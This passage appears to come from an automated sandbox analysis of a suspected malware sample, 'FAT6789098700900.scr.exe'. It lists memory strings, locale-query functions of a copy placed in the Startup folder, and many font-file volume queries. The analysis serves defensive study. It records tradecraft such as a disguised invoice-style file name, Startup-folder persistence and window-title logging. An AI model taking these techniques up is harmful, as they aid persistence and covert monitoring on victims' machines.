                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\98$^
                  Source: .exe, 0000000B.00000002.4125168442.0000000001541000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
                  Source: .exe, 0000000B.00000002.4125168442.0000000001501000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: .exe, 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_10002933 cpuid 11_2_10002933
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: EnumSystemLocalesW,11_2_004470AE
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: GetLocaleInfoW,11_2_004510BA
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004511E3
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00450A7F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: GetLocaleInfoW,11_2_004512EA
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_004513B7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: EnumSystemLocalesW,11_2_00450CF7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: EnumSystemLocalesW,11_2_00450D42
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: EnumSystemLocalesW,11_2_00450DDD
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: GetLocaleInfoW,11_2_00447597
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: GetLocaleInfoA,11_2_0040E679
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Users\user\Desktop\FAT6789098700900.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
